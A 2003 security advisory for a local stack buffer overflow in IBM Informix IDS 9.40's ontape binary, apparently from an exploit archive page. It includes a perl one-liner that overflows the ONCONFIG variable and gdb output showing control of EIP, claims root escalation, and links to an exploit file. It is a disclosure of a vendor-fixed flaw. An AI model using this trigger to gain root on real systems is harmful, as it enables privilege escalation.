open3sIDSontape.txt

open3sIDSontape.txt: Posted Jan 28, 2004; Authored by Juan Manuel Pascual Escriba | Site open3s.com; A stack-based buffer overflow exists in the ONCONFIG environment variable read process when it is bigger than 495 bytes and read in by the IBM Informix IDSv9.40 ontape binary.; tags | advisory, overflow; SHA-256 | 237129932a9575d521e132d6ce68b9b05c5f0b848a26bc2b6672c672bcf3702a; Download | Favorite | View

open3sIDSontape.txt

        ----------========== OPEN3S-2003-08-08-eng-informix-ontape ==========----------


 Title:    Local Vulnerability at Informix IDSv9.40 via ontape binary
 Date:     08-08-2003
 Platform: Only tested in Linux but can be exported to others.
 Impact:   Any user with DSA privileges over Informix could achieve root 
     privileges through a stack buffer overflow in ontape binary
 Author:   Juan Manuel Pascual Escriba pask@open3s.com
 Status:   Solved by IBM Corp.





PROBLEM SUMMARY:

    Stack Buffer overflow exists in ONCONFIG environment variable read 
process when it's bigger than 495 bytes.


[informix@dimoni bin]$ export ONCONFIG=`perl -e 'print "A"x495'`
[informix@dimoni bin]$ ./ontape
WARNING: Cannot access configuration file $INFORMIXDIR/etc/$ONCONFIG.
Segmentation fault

[pask@dimoniet bin]$ gdb ./ontape
(gdb) r
WARNING: Cannot access configuration file $INFORMIXDIR/etc/$ONCONFIG.
Segmentation fault

(gdb) info reg
eax            0xffffffff       -1
ecx            0x40083580       1074279808
edx            0x46     70
ebx            0x1      1
esp            0xbfff74a0       0xbfff74a0
ebp            0x41414141       0x41414141
esi            0xbfff74cc       -1073777460
edi            0x0      0
eip            0x41414141       0x41414141



It's posible to achieve root privileges through this buffer overflow.


IMPACT:
    Any user with exec permision over ontape could achieve root 
privileges. In my default installation only users with DSA privileges
can exec this binary.


SOLUTION:

  See more infomartion about this vulnerability and workaround at:
http://www-1.ibm.com/support/docview.wss?uid=swg21153336


STATUS

Reported to IBM security team at 11th of August 2003

See more infomartion about this vulnerability and workaround at:
http://www-1.ibm.com/support/docview.wss?uid=swg21153336

This vulnerability was managed in an efficient manner by Jonathan Leffler
from IBM Informix Database Engineering Team.




EXPLOIT
    http://www.open3s.com/exploits/OPEN3S-2003-08-08-eng-informix-ontape.c




--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask@open3s.com
Barcelona - Spain                      http://www.open3s.com

Top Authors In Last 30 Days

Red Hat 219 files
indoushka 83 files
Ubuntu 79 files
Gentoo 36 files
Jasper Nota 25 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,707)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,485)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,737)
UNIX (9,435)
UnixWare (187)
Windows (6,672)
Other

open3sIDSontape.txt

open3sIDSontape.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

open3sIDSontape.txt

Share This

open3sIDSontape.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems